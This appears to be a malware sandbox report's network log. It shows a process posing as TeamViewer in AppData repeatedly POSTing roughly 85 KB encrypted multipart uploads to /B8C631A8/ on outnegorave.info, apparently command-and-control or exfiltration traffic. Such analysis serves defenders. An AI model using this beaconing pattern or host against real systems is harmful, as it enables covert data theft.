                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=1d417931ae1d52e75ae61eaa4a3657311fef6c7779eccd2115b101c6618b6548; expires=Thu, 15-Sep-2022 11:52:37 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XxRdhsvKCjcMfe9fyq4F21csb2rtKhaZtj0qcJ5OzLcg5%2Bpga4cARjbIvbovNmHTXk0dd5dfoWISmKqESYLJexKsau4YvwAsoAPP%2BPnMNZDHsPTpPTCXTju%2F%2FPIEAsY72j5F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6639c9f4a6d-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:38 UTC2450INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                     29 | 192.168.2.5 | 49820 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                     Timestamp | kBytes transferred | Direction | Data
                                                                                                                                     2021-09-15 11:52:38 UTC | 2450 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85028
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1216366252
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                     2021-09-15 11:52:38 UTC | 2450 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 31 36 33 36 36 32 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                     Data Ascii: ----------1216366252
                                                                                                                                     Content-Disposition: form-data; name="k"
                                                                                                                                     Content-Type: text/plain
                                                                                                                                     Content-Transfer-Encoding: binary
                                                                                                                                     2021-09-15 11:52:39 UTC | 2533 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:39 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=77bda5ed534eec2b6c6b73faeeaa3fa3e760d97ce32a872709c93ae14510df4f; expires=Thu, 15-Sep-2022 11:52:38 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BIGqQIGeyiFgo4w071TmLdR0uoRXaRIgQDzyFGT20EZppU1n58hJ3HfMsdLmodBQjq1o%2Fu0OtrgYsOMvGYctvw8JUGjRm8KMZILKIJzpIaX1rL4NkKtXsoTUnrXmdLExEkLe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6699c8864fd-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49760 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:51:56 UTC | 258 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84988
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------175819007
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:51:56 UTC | 258 | OUT | Data Ascii:
----------175819007
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:51:56 UTC | 341 | OUT | Data Ascii:
----------175819007--
2021-09-15 11:51:58 UTC | 341 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:51:58 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=7023cd6dc2b381ce2e8efe191c152ba63bd2eb3c0bdf797e643c32c8f3813513; expires=Thu, 15-Sep-2022 11:51:56 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gwrwnNwxfXqGpj5YQbvaN9SdhR2%2BRJRO0zGEL4O0MPjriOVR41fQBmOyZPymVSNWFcDjk6bArv%2BxOIDFmhszVG%2BhdffjkvJK%2FQwS%2BQYXApNYaoHKcQnn6w2GCDoQIi5Cq0Xe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5620c1642d5-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.5 | 49821 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:39 UTC | 2534 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85015
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------3636690275
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:39 UTC | 2535 | OUT | Data Ascii:
----------3636690275
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:39 UTC | 2618 | OUT | Data Ascii:
----------3636690275--
2021-09-15 11:52:40 UTC | 2618 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:40 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=5680050c237b7e3adbaedd32ec81ef6d5a4b30e4dec77061f3e6970425f3f46c; expires=Thu, 15-Sep-2022 11:52:39 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8UgaLEerX2afNhCSPuvZDDVXD%2FQgqGhl8i4jZeugXZAHZbeXvut3dG8CkPlIY8CDWC9mazBLtm0PBgzP04Q%2F%2BwkZA16pEUvGHd0KhKVr7dSvCoQoe%2B%2FYutwIJkJzrwH2XoTt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a66fdd3e690a-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.5 | 49822 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:40 UTC | 2619 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84958
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1861026164
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:40 UTC | 2619 | OUT | Data Ascii:
----------1861026164
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:40 UTC2651OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:40 UTC2667OUTData Raw: 94 53 13 16 8a 28 a0 40 29 69 05 3a 98 84 a7 52 51 4c 18 ea 5a 68 a5 a6 48 ec d2 8a 6d 28 a6 84 c7 0a 5a 6d 38 53 25 85 2d 25 14 c4 2d 14 94 b4 00 52 d2 52 d0 02 d2 d3 69 d4 09 85 28 a4 a5 a0 42 d1 49 4b 40 82 96 8a 29 80 52 8a 29 45 02 62 d0 29 29 45 02 34 34 91 fb f7 3e 88 6a b1 ea 7e b5 6b 49 ff 00 5d 27 fb a6 aa 9e a7 eb 59 2f 8d 84 fe 14 14 51 45 68 64 14 b4 94 b4 08 5a 29 29 69 09 8b 45 14 50 01 4a 28 a2 90 85 a2 8a 29 08 5a 51 49 40 a0 43 a9 57 ad 36 96 93 04 5b 88 d6 be 98 df be 5a c5 89 b8 ad 7d 30 fe f9 7e b5 c7 5d 7b ac f5 30 6f de 44 be 2e 3f e8 48 3d eb 8c b5 ff 00 90 84 3f f5 d1 7f 9d 76 3e 2f ff 00 8f 58 fe b5 c6 da 7f c8 42 0f fa e8 bf ce 9e 13 fd dc db 13 fe f0 76 7a ef fc 7d 2f fb b5 97 8a d4 d7 7f e3 ed 7f dd ac ba 8a 1f 02 23 13 fc 46
                                                                                                                                    Data Ascii: S(@)i:RQLZhHm(Zm8S%-%-RRi(BIK@)R)Eb))E44>j~kI]'Y/QEhdZ))iEPJ()ZQI@CW6[Z}0~]{0oD.?H=?v>/XBvz}/#F
                                                                                                                                    2021-09-15 11:52:40 UTC2683OUTData Raw: 4b 4d a5 a0 43 85 14 94 b5 42 14 52 d3 73 4b 4c 43 b3 4b 4d a5 a0 43 85 28 a6 d2 83 54 99 2c 90 51 48 0d 15 48 91 69 69 28 cd 30 b0 b9 a3 34 82 96 8b 8a c2 8a 5c d3 29 73 4e e1 61 f9 a5 a6 66 97 34 c9 b0 e1 4b 9a 6e 68 a7 70 b0 fc d1 9a 6e 68 dd ed 45 c5 62 40 69 73 51 ee 3e b4 67 de 9d c5 62 4c 8a 33 51 e6 97 34 5c 56 1f 9a 33 4d cd 19 a7 70 b0 ea 5c d3 68 cd 17 15 87 66 97 34 cc d1 9a 77 0b 0f cd 19 a6 6e a4 dd 45 c3 94 93 34 66 a3 dd 46 ea 57 0e 52 4d d4 9b aa 22 f4 d2 f4 39 0d 40 98 b5 34 bd 44 5e 9a 5a a5 cc a5 02 52 f4 c2 f5 19 6a 61 6a 87 22 d4 09 0b fb d3 0b 53 0b 53 0b 54 39 1a 28 8f 2d 4c 2d 4d 2d 4c 2d 59 b9 1a 28 8e 26 98 4d 21 34 95 0d 96 90 a4 d2 52 51 9a 4c 76 10 d1 41 a6 d4 94 83 34 52 52 52 b8 ec 50 c7 7a 5a 4a 2b 94 eb 16 8a 28 c5 00 14
                                                                                                                                    Data Ascii: KMCBRsKLCKMC(T,QHHii(04\)sNaf4KnhpnhEb@isQ>gbL3Q4\V3Mp\hf4wnE4fFWRM"9@4D^ZRjaj"SST9(-L-M-L-Y(&M!4RQLvA4RRRPzZJ+(
                                                                                                                                    2021-09-15 11:52:40 UTC2699OUTData Raw: 93 ed b0 8e 7c b6 c2 ca 3f a3 7e 9f 4a 67 88 3e 1c 6a 36 1b a6 d2 98 df 40 39 d8 06 25 51 f4 fe 2f c3 9f 6a e8 3c 23 e0 6d 0c da c7 7d 73 2f f6 8c 87 aa 32 ed 48 db ba 94 eb 91 dc 37 e5 48 0f 2b 9a 29 20 95 a2 9e 37 8e 44 38 64 75 20 83 ee 0d 32 ba 3f 88 48 91 f8 d6 fd 23 55 44 51 10 0a a3 00 0f 29 2b 9c aa 10 55 bd 36 c9 af ae 84 60 ed 41 cb b7 a0 aa 95 d0 78 5f 6e 2e 41 eb f2 fe 5c d4 c9 d9 68 45 4a 8a 9a e7 6a f6 37 2c f4 6b 70 9b 2d ac c4 9b 47 24 a6 e3 f8 d5 7d 43 c3 82 e1 58 47 6a d0 cc 3a 15 42 3f 31 5b a3 7f f6 6d b8 8b 26 31 9d f8 fe fe 7b fe 18 ad bd 37 cd fb 0a 79 f9 dd 93 b7 77 5d bd bf ad 61 89 a5 2a 18 75 88 52 d7 b1 e8 c3 1d 4e b4 fd 94 61 ee 9e 2d 34 4f 04 cf 14 aa 55 d0 95 60 7b 1a 65 6d 78 c7 cb ff 00 84 a2 f7 ca c6 37 2e 71 eb b4 67 f5
                                                                                                                                    Data Ascii: |?~Jg>j6@9%Q/j<#m}s/2H7H+) 7D8du 2?H#UDQ)+U6`Ax_n.A\hEJj7,kp-G$}CXGj:B?1[m&1{7yw]a*uRNa-4OU`{emx7.qg
                                                                                                                                    2021-09-15 11:52:40 UTC2702OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 36 31 30 32 36 31 36 34 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1861026164--
2021-09-15 11:52:41 UTC | 2702 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:41 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=c836121081c168a6ee523fe5fadb5d19dd7b7a46406c1a515623898e8ca6a841; expires=Thu, 15-Sep-2022 11:52:40 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3LIIdID%2BkwlfwIlfmAMMncJjjEHrk%2Bk1dqf2UgvknDf%2FUPG1wtMzU4VMFvcvlgugzBNFOwC1GtMw343udD1KA%2BGj7gnhYXzXUa3N8Mi%2BLkpTUJTw%2FyP%2BO7x1TuNZpiObRAaP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6779a96d6e1-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:41 UTC | 2703 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.2.5 | 49823 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:41 UTC | 2703 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84979
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2060288736
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:42 UTC | 2786 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:42 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=3555c1bb573aa00d8de055a57f8aebf6e68de051c68d0b72a030dd46b103fd1e; expires=Thu, 15-Sep-2022 11:52:41 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y6oXd5mFq2wH%2FLhJXQI3AOVtdGQ%2FiB%2Fc1S6k7O0D353cNCwtqLF71nnI7bxTikcFdCfUTTnTEh1GXMYNCsM9%2BUbUBhvyt5mNS9JZO2mUsshjK7u0AviuSShEcR6ZCGUktBLt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a67dbf0c2c22-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:42 UTC | 2787 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.2.5 | 49824 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:42 UTC | 2787 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85018
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1941005641
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Data Ascii: 1EO9'W=5,MIG>[aeO35iLot6mcFCvmJuJO"2:A]$Hk~(QU*dB0vUJ</ .jd"EMs{z5MbMSqjp#hf6E=V<:)kaZ~0O'gU*J
                                                                                                                                    2021-09-15 11:52:42 UTC2870OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 39 34 31 30 30 35 36 34 31 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1941005641--
2021-09-15 11:52:43 UTC | 2870 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:43 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=6a59ae9338336a9533804596d61787d94bc0dc9f7b67c05803c82a6a485b3ebe; expires=Thu, 15-Sep-2022 11:52:42 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tmJ4rOI3cXLzEu8zxMC7AO7ojxjB3vB7dCNBSk4tM1YT6uupyqBftZIPzVnet5jn2%2FZT6Sc32yxidsd7fPPsG2Qi6tvVvkGca8cmzhC%2F%2BMB265Ylk2%2FI6B%2BhBITAjPEt7ESo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6838b6e145a-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:43 UTC | 2871 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
34 | 192.168.2.5 | 49825 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:43 UTC | 2871 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 84997
Content-Type: multipart/form-data; boundary=--------168896387
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:44 UTC | 2954 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:44 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=0520f37511019a32c874499f14c1766570e6bccde0d39622db35c24fb772fa29; expires=Thu, 15-Sep-2022 11:52:43 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FFOuu2IdBEN2FmEJqtf9%2FioN%2FhZDfpdli46C1KpB0aVQbIUGZGz6UD5eifurE%2BKsOVylufOjCOpRvx9J5oAJ55gwYEpY6zhpJHiAwwbPiONYbW11bOg0VsUAdlwSvo%2BcZ5af"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a68a68604a9e-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:44 UTC | 2955 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.2.5 | 49826 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:45 UTC | 2955 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 84996
Content-Type: multipart/form-data; boundary=--------2074872272
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:45 UTC | 3039 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:45 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=ff6d2ecb6c3d11db033c5039b9ad779e00511bb16ffe630d7ee68d53c654af9b; expires=Thu, 15-Sep-2022 11:52:45 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Kib5rl%2F43kEyRMr23qs3QVtkqxZ5UdBsVwE4Ar2%2FPzGsmaUtHalBD7Ds3BwGp%2FuwlcNg%2Ba5F4HuahxIuGP3DMEYbYQ0xQs16U0obIquuUH2Uvpc3sY9m0zfMnVuYUxsp1LgB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6938bed97d8-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:45 UTC3040INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.2.5 | 49828 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:46 UTC | 3040 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 85003
Content-Type: multipart/form-data; boundary=--------1323967378
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
